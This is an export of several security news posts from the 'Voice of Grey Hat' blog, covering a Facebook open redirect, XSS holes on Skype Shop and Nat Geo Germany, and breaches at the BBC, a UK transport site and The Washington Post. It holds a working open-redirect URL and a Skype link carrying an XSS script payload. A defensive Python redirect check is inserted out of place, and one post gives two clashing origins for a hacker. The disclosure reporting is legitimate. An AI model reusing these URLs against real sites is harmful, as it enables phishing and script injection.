red;">http://www.voiceofgreyhat.com</span></b>&mac=AQLy7nyXi5NBt31j&__tn__=*B&eid=AQLpbizR7KEf3cyD0VTN7fNtv99fMZABDp2gdWhvL-MQocJIPy3w4hUG7_7hrmSMqDq7QLCI9k_0LbB95NEz_6GUDHGNgTDsGP_rX-VWRHxfg5a--VlnN1K9FdG3NAek8r2JPWENkb2Mu56EckbZCGXcPie27OnHxE-H7MBufQel0Pr-ZjpCWB6QF5xHeWsdKqyHzjK2woBGGrjk9Dlgnzcw3d9ZWPzrwbGpm6MSkpks3mqEphXnTP2Vd9UDQxIs68NnTaO35XIwKq5t3CSdb11iU_34gzjfLgvvDo_BYbgtrGe0Juc5CpRSwd5nImw9oPPvn6Za9rrxO_ivROtOGc2b2S3bYzNLWpbDwt3cFN2rJ3JElyIR0vjB4R859PpE9SrZx6AD3s_liikzPh30YLVb8XvPABk7r9MShk6OrVFPiAWZnEvPx49UzPDSF-nEl188rEPAi0KGJ4u1zb10hhzmHUCjH04SezDByUkyNituMb2lgiQz-Xlpgy_tkVYR-U7plDa38N9VzdAj_Bwefd7B85ykZCAy9ZQOt48Ql8KQeKfivk3sThZIkLwWPiju7R28Sw6bj09vS_Y28kFSqanGe9tYAPfKIe4zOzQt9-Q1CC_EwX3ypOlyQ2yXMiU3lwp7M9EriKHRFDsTgsuzzF-uvlpx3UrWh8M55-NX0ULjr4kxjAR5g_1wU-luUyn_Ot6Ly1_ZbBdahyb5uSmCDNvF5kMuIH8Gxvpql45dNffGzKau9oZGn6r1OmsG47JIGipznCVaZnWjXAakDnEMX6X8ZtI-M-db1olzbBpJdj5sZe-x2VM02S5XsXJWe_QLxFDOupjbz8I82HETHQ9PbzSIMsJboll4E3-f_JQFfdzwEguLa8SC_ImRahWBCwKNJeSlmRv91FqWpQaChe5-UyAoqcblvK4jPuRO3qC7o-qMTQ2jEJqqUW46koulOmgNJpMYXPgRxjNGcwjyTPS59Nr08zq6eCNd1aYLh2E4s5MYXBtVUTF8l0uhQ2wYSoR66xZsI2tK0DD1KiQHyTO1QieBwPtCN3eWgRzUTg3lM3ttkuwYKRPPLDvtUOPWmZhYUzUFcbfPM2kXdpqyGlrGx9-ErKGygYKATx2xzrTzktjgW4q0L5wfO3CSKAOCAoKfi_pfz-zIHSNE8ZAjZDtpbC_chgkvbHWJYYIs7pnE1riWJYORACjkkRr6nZoivC3z_g-8JBahghwy2C34kJYZJ6cBC8LKoB6KCTbj_F1tArQAzcSUij4vrJNUATzsdlO_ol6HwUQb8FjoWa38Bhtx81stxB328sgC9IGu1omPG0QeNJVhcJwh6HyEwtgycBLrlcdedaWbkwvnjv3F3BWuJIi763nBeYuAgNUaEUYHaXu_ZJzXW8fQ72nz_hddGT_GH50&sig=89099</a><br />
<br />
Replace voiceofgreyhat.com with any site of your choice, and the vulnerability will redirect you from Facebook to that website. This loophole is still active, and anyone can test it with the above URL. We consider the impact of this loophole very serious, as any malicious attacker can misuse the trust placed in Facebook's URL to harm regular internet users by redirecting them to junk or malfunctioning websites.<br />
<br />
<b><u>Disclaimer:-</u></b> As I said earlier, the issue has already been brought to the notice of Facebook Security, but they overlooked the whole issue, so as a responsible <a href="http://www.voiceofgreyhat.com/search?q=cyber+media">cyber media</a> outlet, we at VOGH are disclosing this to the public. If anyone misuses this vulnerability, <a href="http://www.voiceofgreyhat.com/">Voiceofgreyhat</a> will not be responsible for any kind of mishap.<br />
<br />
<div style="text-align: justify;">
<b><u>Update:-</u></b> It may be more than what we call late repentance, but the vulnerability disclosed above has finally been patched by the Facebook security team. </div>
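The redirect described above works because the endpoint forwards the browser to whatever the <code>u</code> parameter contains. The Python sketch below is an added example, not Facebook's code and not code from the original post: it shows how a redirect endpoint can validate <code>u</code> before answering. The hosts under example.com, the evil.test samples, the fallback path and all function names are assumptions made for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Assumptions (not from the original post): the application's own hosts and fallback page.
ALLOWED_HOSTS = {"apps.example.com", "www.example.com"}
ALLOWED_SUFFIXES = (".example.com",)  # leading dot stops "evilexample.com" from matching
FALLBACK = "/"


def host_allowed(host):
    """Exact match or subdomain match against the allowlist."""
    host = host.rstrip(".").lower()
    return host in ALLOWED_HOSTS or host.endswith(ALLOWED_SUFFIXES)


def safe_target(u):
    """Return u when it is an acceptable redirect target, otherwise FALLBACK."""
    # Reject empty values, whitespace, control characters and backslashes up front:
    # browsers drop or normalise these, so the host we parse could differ from
    # the host the browser finally visits.
    if not u or any(ord(c) <= 0x20 or ord(c) == 0x7F or c == "\\" for c in u):
        return FALLBACK
    try:
        parts = urlsplit(u)
        host, _ = parts.hostname, parts.port  # .port raises ValueError on junk ports
    except ValueError:  # also raised for malformed IPv6 literals
        return FALLBACK
    if not parts.scheme and not parts.netloc:
        # Same-site path: exactly one leading slash ("//host" is protocol-relative).
        return u if u.startswith("/") and not u.startswith("//") else FALLBACK
    if parts.scheme not in ("http", "https"):
        return FALLBACK
    # "https://trusted@other-host/" puts the trusted name in the userinfo part.
    if "@" in parts.netloc or not host:
        return FALLBACK
    return u if host_allowed(host) else FALLBACK


def redirect_location(request_url):
    """Resolve the Location header for a request shaped like /a.php?u=<target>."""
    values = parse_qs(urlsplit(request_url).query).get("u", [])
    # A repeated parameter is read differently by different parsers: treat as invalid.
    if len(values) != 1:
        return FALLBACK
    return safe_target(values[0])


if __name__ == "__main__":
    # Constructed sample requests, not captured traffic.
    samples = [
        "https://apps.example.com/a.php?u=%2Fsettings",
        "https://apps.example.com/a.php?u=https://www.example.com/help",
        "https://apps.example.com/a.php?u=http://www.voiceofgreyhat.com&sig=0",
        "https://apps.example.com/a.php?u=%2F%2Fevil.test%2F",
        "https://apps.example.com/a.php?u=https://www.example.com@evil.test/",
        "https://apps.example.com/a.php?u=https://www.example.com.evil.test/",
    ]
    for s in samples:
        print(f"{s}\n    -> Location: {redirect_location(s)}")
```

Any value that fails a check is replaced by the fallback page, so a link on the trusted domain can no longer deliver the visitor to an arbitrary third-party site.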
<br />
<br />
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-74968137841056245312014-01-02T23:09:00.000+05:302014-01-02T23:09:49.999+05:30 BBC Server Compromised! Russian Hackers Broke Into FTP & Tried to Sell Unauthorized Access <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b>BBC</b> Server <b><span style="color: red;">Compromised!</span></b> <b>Russian Hackers</b> <i>Hacked</i> Into <b><span style="color: red;">FTP</span></b> & Tried to Sell <b>Unauthorized Access </b>on The<b> X-Mass Evening</b> </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL28aQEEa_I83unjNK4R5HfgrriQdWbjpNcGiYrT9PZfTTiLGAUAERSPNuD6_9ukBoWTOMZBcI-KeiFZZXj1Gt0VtkjwZ8H_kBYK43mcoW-BL-SDkHRCf7iJ7z5Bf__4Yuikgpq6DxUR4/s1600/bbc-ftp-server-hacked-by-russian-hackers.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL28aQEEa_I83unjNK4R5HfgrriQdWbjpNcGiYrT9PZfTTiLGAUAERSPNuD6_9ukBoWTOMZBcI-KeiFZZXj1Gt0VtkjwZ8H_kBYK43mcoW-BL-SDkHRCf7iJ7z5Bf__4Yuikgpq6DxUR4/s320/bbc-ftp-server-hacked-by-russian-hackers.jpg" width="400" /></a></div>
<div style="text-align: justify;">
Earlier we saw world-renowned media houses like <a href="http://www.voiceofgreyhat.com/search?q=CNN">CNN</a>, <a href="http://www.voiceofgreyhat.com/search?q=NBC">NBC</a>, <a href="http://www.voiceofgreyhat.com/search?q=Fox">Fox News</a>, <a href="http://www.voiceofgreyhat.com/search?q=Washington+Post">Washington Post</a>, <a href="http://www.voiceofgreyhat.com/2013/02/chinese-hackers-breached-new-york-times.html">NY Times</a>, <a href="http://www.voiceofgreyhat.com/search?q=NDTV">NDTV</a> and so on fall victim to <a href="http://www.voiceofgreyhat.com/search?q=hackers">hackers</a> and <a href="http://www.voiceofgreyhat.com/search?q=cyber+criminals">cyber criminals</a>. Now it is the turn of the world’s largest and oldest broadcaster, the <b>British Broadcasting Corporation</b>, widely known as the <b><a href="http://www.voiceofgreyhat.com/search?q=BBC">BBC</a></b>. Sources <a href="http://www.reuters.com/article/2013/12/29/us-bbc-cyberattack-idUSBRE9BS06K20131229">revealed</a> that cyber criminals managed to <a href="http://www.voiceofgreyhat.com/search?q=breach">breach</a> the <a href="http://www.voiceofgreyhat.com/search?q=security+system">security system</a> of the BBC, secretly took over a computer <a href="http://www.voiceofgreyhat.com/search?q=server">server</a> there and then launched a Christmas Day campaign to convince other cyber criminals to pay for access to the system. The attack was first identified by <a href="http://www.voiceofgreyhat.com/search?q=cyber+security">cyber security</a> firm <a href="http://www.holdsecurity.com/">Hold Security LLC</a> of Milwaukee, which monitors <a href="http://www.voiceofgreyhat.com/search?q=cyber+crime">underground cyber crime</a> forums in search of stolen information. However, it is still not clear whether the hacker stole any information or data or caused any damage to the site. 
Speaking to the press, <b>Alex Holden</b>, founder and Chief Information Security Officer of Hold Security, said, “So far Hold Security researchers have found no evidence the conversations led to a deal or that data was stolen from the BBC.” The identity of the hacker has not been confirmed, but the firm's researchers observed a notorious <a href="http://www.voiceofgreyhat.com/search?q=Russian+hacker">Russian hacker</a> known by the monikers <b>"HASH"</b> and <b>"Rev0lver" </b>attempting to sell access to the BBC server on December 25. However, the BBC's security team managed to secure the site on Saturday, according to a person close to the cleanup efforts. A BBC spokesman refused to comment on the issue, saying, <i>“We do not comment on security issues.”</i> On the other hand, Justin Clarke, a principal consultant for the cyber security firm <a href="http://www.cylance.com/">Cylance</a>, said that “accessing that server establishes a foothold within BBC's network which may allow an attacker to pivot and gain further access to internal BBC resources.” We all know that <a href="http://www.voiceofgreyhat.com/search?q=FTP">FTP systems</a> are typically used to manage the transfer of large data files over the Internet. That is why the chance of a <a href="http://www.voiceofgreyhat.com/search?q=data+breach">data breach</a> cannot be ruled out at this time. For updates on this piece of news and other hot information from the cyber & tech world, stay tuned with <b><a href="http://www.voiceofgreyhat.com/">VOGH</a></b>. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-7191343863096887272013-12-26T21:06:00.000+05:302013-12-26T21:06:53.678+05:30Skype Shop & National Geographic Germany (Nat Geo) Vulnerable to XSS<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b><span style="color: #3d85c6;">Skype Shop</span></b> & <b><span style="color: orange;">National Geographic Germany (Nat Geo) </span><span style="color: red;">Vulnerable</span></b> to <b><span style="color: red;">XSS </span></b>-Said <b><i>Dr41DeY</i></b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKALpkZ1wIJCDCxQhXAxbIK2NXtyl2u4thKTFxayCXkplWNtPu9FQbcnEu7R1WxPJNN2uXh_A1Bl9sk_L5BIdA046gOL0jty5_2QTM3O_RWb2JdfilMdvwSptO8f3b87YDqgPtYBVUu_w/s1600/Skype-XSS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKALpkZ1wIJCDCxQhXAxbIK2NXtyl2u4thKTFxayCXkplWNtPu9FQbcnEu7R1WxPJNN2uXh_A1Bl9sk_L5BIdA046gOL0jty5_2QTM3O_RWb2JdfilMdvwSptO8f3b87YDqgPtYBVUu_w/s400/Skype-XSS.png" width="400" /></a></div>
<div style="text-align: justify;">
A couple of weeks ago, I talked about the <a href="http://www.voiceofgreyhat.com/search/label/vulnerablity">vulnerability</a> in the <a href="http://www.voiceofgreyhat.com/2013/12/cartoonnetworkvulnerable2-xss.html">Cartoon Network</a> official website. Today I am going to talk about two more big fish with serious <a href="http://www.voiceofgreyhat.com/search?q=security+holes">security holes</a> in their official websites. Let's not waste time stretching the preface and come directly to the story: the <a href="http://www.voiceofgreyhat.com/search?q=hacker">hacker</a> who recently made his name with some big hacks is back again. </div>
<div style="text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhORGhAWJSBaevh8_VnZR1K7OQQ3t_vxi4jI7FyD2l1SusSxlopSj2EK7BNmSE3Dj1GHQLWzsJ35wS8PZPKjUf03ZoYeTZeFjEvDVGRF_C10Qezm4VlsnEpXq7Xelc-ZvLPS6sHgRAckYQ/s1600/Nat+Geo-XSS.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhORGhAWJSBaevh8_VnZR1K7OQQ3t_vxi4jI7FyD2l1SusSxlopSj2EK7BNmSE3Dj1GHQLWzsJ35wS8PZPKjUf03ZoYeTZeFjEvDVGRF_C10Qezm4VlsnEpXq7Xelc-ZvLPS6sHgRAckYQ/s320/Nat+Geo-XSS.png" width="320" /></a>Many of you guessed right: I am talking about <a href="http://www.voiceofgreyhat.com/search?q=Dr41DeY">'Dr41DeY'</a>, the guy who found a <a href="http://www.voiceofgreyhat.com/search?q=vulnerability">vulnerability</a> in the official websites of <b><a href="http://shop.skype.com/">Skype Shop</a></b> and <b><a href="http://www.nationalgeographic.de/">National Geographic Channel Germany (Nat Geo)</a></b>. Both Nat Geo and Skype have a non-persistent cross-site scripting <a href="http://www.voiceofgreyhat.com/search/label/vulnerablity">vulnerability</a>, also known as an <b><a href="http://www.voiceofgreyhat.com/search?q=XSS">XSS vulnerability</a></b>, in their websites. We have already reported this issue to the concerned authorities and webmasters to avoid misfortune. As expected, at the time of writing <a href="http://www.voiceofgreyhat.com/search?q=skype">Skype</a> has taken this issue seriously and <a href="http://shop.skype.com/skype-cards/?cid=%22%3E%3Cscript%3Ealert%28%22Dr41DeY%20XSS'ed%20You%20@Nigerian%20Cyber%20Army%22%29%3C%2Fscript%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E">fixed their loopholes</a> immediately. Still, as proof, I have shared the screenshots above with our readers <span style="font-family: inherit;">as evidence of the XSS hole. But unlike Skype Shop, Nat Geo has not yet responded, so the vulnerability still exists on their portal. 
<span style="background-color: white; line-height: 24px;">Hopefully they will take appropriate steps without further delay. For updates on this story and other hot cyber issues, just stay tuned with </span><b style="background-color: white; line-height: 24px; margin: 0px; padding: 0px;"><a href="http://www.voiceofgreyhat.com/" style="margin: 0px; outline: none; padding: 0px; text-decoration: none;">VOGH</a></b><span style="background-color: white; line-height: 24px;">. Before concluding, I would like to remind you that in 2012 an Indian hacker named</span></span><span style="line-height: 24px; text-align: left;"> Akshay found <a href="http://www.voiceofgreyhat.com/2012/03/official-website-of-national-geographic.html">XSS holes in the official website of </a></span><span style="line-height: 24px; text-align: left;"><a href="http://www.voiceofgreyhat.com/2012/03/official-website-of-national-geographic.html">National Geographic</a>. A year later, </span><span style="text-align: left;"><span style="line-height: 24px;"><a href="http://www.voiceofgreyhat.com/search?q=Dr41DeY">Dr41DeY</a> has found another <a href="http://www.voiceofgreyhat.com/search?q=National+Geographic">Nat Geo</a> site vulnerable to XSS, which definitely raises doubts about the security of one of the world's leading </span></span><span style="line-height: 24px;">satellite television channels featuring documentaries with factual content involving nature, science, culture, and history, plus some reality and pseudo-scientific entertainment programming. </span></div>
<br />
<div style="text-align: justify;">
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-3712196347744610472013-12-21T23:44:00.000+05:302013-12-21T23:44:55.520+05:30Taith North Wales Transport & Travel Planning of UK Govt Hacked By Pakistani Hacker<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="orphans: 2; text-align: center; widows: 2;">
<span style="font-size: large;"><b><span style="color: red;">Taith North Wales Transport & Travel Planning (Govt of UK)</span></b>, Few Other <b>High Profile Websites</b> <b><i><span style="color: red;">Hacked </span></i></b>By <b><span style="color: red;">'KHAN' </span>(Pakistani Hacker)</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpHEvqElHvYHt-0wrvZAy5bimhQt4t1032Kic7zBfreG-ldzu-OAEwEmvo1oq0vseZlEJfpkbXrmjqTl-0a0lx5aTys-sAxQlpuwvkTjqeoIpJJN0MQ29NnsT8zvhKVFDEDMMFlwU5hiM/s1600/taith.gov.uk-hacked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpHEvqElHvYHt-0wrvZAy5bimhQt4t1032Kic7zBfreG-ldzu-OAEwEmvo1oq0vseZlEJfpkbXrmjqTl-0a0lx5aTys-sAxQlpuwvkTjqeoIpJJN0MQ29NnsT8zvhKVFDEDMMFlwU5hiM/s400/taith.gov.uk-hacked.png" width="450" /></a></div>
<div style="orphans: 2; text-align: justify; widows: 2;">
A hacker from <a href="http://www.voiceofgreyhat.com/search?q=Pakistan">Pakistan</a> going by the nickname 'KHAN' has targeted several high-value websites in the United Kingdom. The cyber attack happened a few days ago, when 'Khan' hacked into the website of Taith North Wales Transport and Travel Planning of the UK Government. Taith is a joint committee of six county authorities from North Wales that handles transport and travel planning. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7wfzwZi7kXieMsxwv2VR5SWANgEW1rfC5apnAXUNht1k2edEDWR1Ql5KzP15yWev_Z3PKXFLGWvZBZopL4kfK7KX5vBU00zUyPwahC6A_Rwcd5vaZoY6VhiKpPjw68L9zieYPKoqbm1Y/s1600/defaced-page-message-by-hacker.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7wfzwZi7kXieMsxwv2VR5SWANgEW1rfC5apnAXUNht1k2edEDWR1Ql5KzP15yWev_Z3PKXFLGWvZBZopL4kfK7KX5vBU00zUyPwahC6A_Rwcd5vaZoY6VhiKpPjw68L9zieYPKoqbm1Y/s320/defaced-page-message-by-hacker.png" width="320" /></a></div>
Sources revealed that the hacker, who is from Italy, managed to gain access to one of the servers of the UK govt, and thus successfully hacked the site and replaced the index page with a customized message saying- "today i am again with same message uk goverment deciding Ban Hijab for muslim womens what the hell is this! when your womens wear underware and come out of home beaches, road, you said this is freedom ? this is no problem ? but when our ladies , sisters , mothers wear hijab you said this is problem . so you call this justice ? i will fight for our right like a legend till i die .. We Want Freedom For Our Religion. You can kill us but cant kill our idea!" The hacker also claimed that, besides the defacement, he managed to breach the database of the website. As soon as the security breach was spotted, the authorities of the Taith North Wales Transport Dept took immediate steps and restored the site. At the time of writing this news, the Taith Transportation portal has come back online in its normal format. Also, in his deface page 'Khan' claimed responsibility for the intrusion against the <a href="http://zone-hc.com/archive/mirror/8669152_eng.customs.ru_mirror_.html">Customs of Russia official website</a>. This hacking rampage also affected several other high-profile UK websites, such as <a href="http://www.zone-h.org/mirror/id/21369910">Hotel Black Boy Inn</a>, <a href="http://www.zone-h.org/mirror/id/21369598">Buckley Industry</a>, <a href="http://www.zone-h.org/mirror/id/21369570">Groes News</a>, <a href="http://www.zone-h.org/mirror/id/21369562">Spirit Models</a>, <a href="http://www.zone-h.org/mirror/id/21365219">Livetech</a>, <a href="http://www.zone-h.org/mirror/id/21370110">ByteBack Training</a> & a few more.<br />
<br />
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-19051847596957765022013-12-20T00:55:00.002+05:302013-12-20T00:55:34.281+05:30The Washington Post Server Breached! Chinese Hackers Apprehend For This Cyber Attack <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b>The Washington Post </b>Server <b><span style="color: red;">Hacked</span></b>! <i>Suspected</i> That <b><span style="color: red;">Chinese Hackers</span></b> Are Behind This <b>Cyber Attack </b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgDaQ-ACkxAxzNvUG38lJ96IejS7hyphenhyphenklJ2KDgDF3zJdRFoVz_RTmM4yjj6n9arx14InY9KF4TD7duicoTkengEHFsYeVEDrSVAF8RCBtZcQBaQ1cYRzLef2b3ZaSq4nKKn3-X9x9bgQfg/s1600/washington-post-hacked-by-chinese-hackers.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgDaQ-ACkxAxzNvUG38lJ96IejS7hyphenhyphenklJ2KDgDF3zJdRFoVz_RTmM4yjj6n9arx14InY9KF4TD7duicoTkengEHFsYeVEDrSVAF8RCBtZcQBaQ1cYRzLef2b3ZaSq4nKKn3-X9x9bgQfg/s400/washington-post-hacked-by-chinese-hackers.jpg" width="500" /></a></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">Last week </span><a href="http://www.voiceofgreyhat.com/2013/12/china-eavesdropping-europeans-before-G20-summit.html" style="font-family: inherit;">the story</a><span style="font-family: inherit;"> of </span><a href="http://www.voiceofgreyhat.com/search?q=Chinese+eavesdropping" style="font-family: inherit;">Chinese eavesdropping</a><span style="font-family: inherit;"> on European ministries and diplomats at the </span><a href="http://www.voiceofgreyhat.com/2013/12/china-eavesdropping-europeans-before-G20-summit.html" style="font-family: inherit;">G20 summit</a><span style="font-family: inherit;"> drew the attention of the entire </span><a href="http://www.voiceofgreyhat.com/search?q=cyber+world" style="font-family: inherit;">cyber world</a><span style="font-family: inherit;"> and made headlines. Now another breathtaking issue has come to light, in which </span><a href="http://www.voiceofgreyhat.com/search?q=China" style="font-family: inherit;">China</a><span style="font-family: inherit;"> is again found responsible for a </span><a href="http://www.voiceofgreyhat.com/search?q=security+breach" style="font-family: inherit;">security breach</a><span style="font-family: inherit;">, one that affected </span><b style="font-family: inherit;"><a href="http://www.washingtonpost.com/">The Washington Post</a></b><span style="font-family: inherit;"> - the most widely circulated newspaper published in Washington, D.C. 
</span><a href="http://www.washingtonpost.com/business/technology/hackers-break-into-washington-post-servers/2013/12/18/dff8c362-682c-11e3-8b5b-a77187b716a3_story.html" style="font-family: inherit;">Sources revealed</a><span style="font-family: inherit;"> that </span><a href="http://www.voiceofgreyhat.com/search?q=hackers" style="font-family: inherit;">hackers</a><span style="font-family: inherit;"> broke into The Washington Post’s servers and gained access to </span><b style="font-family: inherit;"><span style="color: red;">employee user names and passwords</span></b><span style="font-family: inherit;">. </span><a href="https://www.mandiant.com/%E2%80%8E" style="font-family: inherit;">Mandiant</a><span style="font-family: inherit;">, a </span><a href="http://www.voiceofgreyhat.com/search?q=cyber+security" style="font-family: inherit;">cyber security</a><span style="font-family: inherit;"> contractor that monitors The Washington Post’s networks, said the </span><a href="http://www.voiceofgreyhat.com/search?q=intrusion" style="font-family: inherit;">intrusion</a><span style="font-family: inherit;"> was of relatively short duration. The extent of the loss of company data was not immediately clear. The one matter of relief is that the company </span><a href="http://www.voiceofgreyhat.com/search?q=password" style="font-family: inherit;">passwords</a><span style="font-family: inherit;"> are stored in </span><a href="http://www.voiceofgreyhat.com/search?q=encrypted" style="font-family: inherit;">encrypted form</a><span style="font-family: inherit;">, although hackers in some cases have shown the ability to decode such information. 
To avoid any further mishap, The Washington Post has planned to ask all employees to </span><b style="font-family: inherit;">change their user names and passwords</b><span style="font-family: inherit;"> on the assumption that many or all of them may have been </span><a href="http://www.voiceofgreyhat.com/search?q=compromised" style="font-family: inherit;">compromised</a><span style="font-family: inherit;">. Officials at The Washington Post said that they saw no evidence that subscriber information, such as credit cards or home addresses, was accessed by the hackers. Nor was there any sign that the hackers had gained access to The Post’s publishing system, e-mails or sensitive personal information of employees, such as their Social Security numbers. Post officials found that this hack is more recent than the </span><a href="http://www.washingtonpost.com/business/technology/chinese-hackers-suspected-in-attack-on-the-posts-computers/2013/02/01/d5a44fde-6cb1-11e2-bd36-c0fe61a205f6_story.html" style="font-family: inherit;">2011 one</a><span style="font-family: inherit;">. They also said it began with an intrusion into a server used by The Post’s foreign staff but eventually spread to other company servers before being discovered. </span><i style="font-family: inherit;">“This is an ongoing investigation, but we believe it was a few days at most,”</i><span style="font-family: inherit;"> said Post spokeswoman Kris Coratti. </span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">The Washington Post is not the only target. <span style="background-color: white; line-height: 24px; margin: 0px; padding: 0px;">If we look at the major <a href="http://www.voiceofgreyhat.com/search?q=cyber+attack" style="margin: 0px; outline: none; padding: 0px; text-decoration: none;">cyber attacks</a> of <a href="http://www.voiceofgreyhat.com/2013/" style="margin: 0px; outline: none; padding: 0px; text-decoration: none;">this year</a>, we find that the name of China has come up</span><span style="background-color: white;"><span style="line-height: 24px;"> several times in connection with <a href="http://www.voiceofgreyhat.com/search?q=cyber+attacks">cyber attacks</a> against several high-profile U.S. news organizations, including the </span></span><a href="http://www.voiceofgreyhat.com/2013/02/chinese-hackers-breached-new-york-times.html" style="background-color: white; line-height: 24px; margin: 0px; outline: none; padding: 0px; text-decoration: none;"><span style="margin: 0px; padding: 0px;">New York Times</span></a><span style="background-color: white; line-height: 24px;">, </span><a href="http://www.voiceofgreyhat.com/2013/02/NBC.com-Compromised.html" style="background-color: white; line-height: 24px; margin: 0px; outline: none; padding: 0px; text-decoration: none;"><span style="margin: 0px; padding: 0px;">NBC</span></a><span style="background-color: white; line-height: 24px;"> and so on. So far the <a href="http://www.voiceofgreyhat.com/search?q=Chinese+Government">Chinese Government </a>has not responded to this issue, and no Chinese hacker community has taken responsibility for this <a href="http://www.voiceofgreyhat.com/search?q=breach">breach</a>. For upcoming updates on this story, stay tuned with <a href="http://www.voiceofgreyhat.com/">VOGH</a>. </span></span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><span style="background-color: white; line-height: 24px;"><br /></span></span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><span style="background-color: white; line-height: 24px;"><br /></span></span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><span style="background-color: white; line-height: 24px;"><br /></span></span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><span style="background-color: white; line-height: 24px;"><br /></span></span></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-2746002507731690882013-12-20T00:55:00.000+05:302013-12-20T00:55:22.039+05:30Red Hat Enterprise Linux 7 Beta Arrives! Download Now And You Can Win $500<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="font-size: large;"><b><span style="color: red;">Red Hat Enterprise Linux (RHEL) 7</span></b> Arrived With Expanded <b>Container Support</b>, <b>Performance Profiles</b>, <b>XFS</b> As the Default Filesystem & Many More. </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqZ1WPgSCWcIasn-yOLTixJpIMK7YNGeR20Pr4q_zMuklQ7ziSGcOFEvGd7eU1Xk6jaUgX1Lh215kpKlrmeIatlr_MDzbzazk6rSr2bXnkCfcBn4SXGcRngPc2HfY0teA0gPt9uUu4dZs/s1600/Red+Hat+Enterprise+Linux+7+Beta.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqZ1WPgSCWcIasn-yOLTixJpIMK7YNGeR20Pr4q_zMuklQ7ziSGcOFEvGd7eU1Xk6jaUgX1Lh215kpKlrmeIatlr_MDzbzazk6rSr2bXnkCfcBn4SXGcRngPc2HfY0teA0gPt9uUu4dZs/s400/Red+Hat+Enterprise+Linux+7+Beta.png" width="500" /></a></div>
<span style="font-family: inherit;">Less than a month after <a href="http://www.voiceofgreyhat.com/2013/11/redhat-enterprise-linux-rhel-6.5-released.html">Red Hat Enterprise Linux 6.5</a> was made available globally, the <a href="http://www.voiceofgreyhat.com/search?q=America">American</a> multinational software company that leads the world in <a href="http://www.voiceofgreyhat.com/search?q=open-source">open-source</a> software has <a href="http://www.redhat.com/about/news/archive/2013/12/red-hat-announces-availability-of-red-hat-enterprise-linux-7-beta">announced</a> the availability of the first public beta release of <b><a href="http://www.voiceofgreyhat.com/search?q=RHEL">Red Hat Enterprise Linux (RHEL) </a>version 7</b>. Based on <b><a href="http://www.voiceofgreyhat.com/search?q=Fedora">Fedora 19</a> </b>and the upstream <b><a href="http://www.voiceofgreyhat.com/search?q=kernel">Linux 3.10 kernel</a></b>, Red Hat Enterprise Linux 7 will provide users with powerful new capabilities that streamline and automate installation and deployment, simplify management, and enhance ease-of-use, all while delivering the stability that enterprises have come to expect from <a href="http://www.voiceofgreyhat.com/search?q=Red+Hat">Red Hat</a>. This further solidifies Red Hat Enterprise Linux's place as the world's leading Linux platform and a standard for the enterprise of the future. Whether rolling out new applications, virtualizing environments or scaling the business with cloud, Red Hat Enterprise Linux 7 delivers the keystone to IT success. 
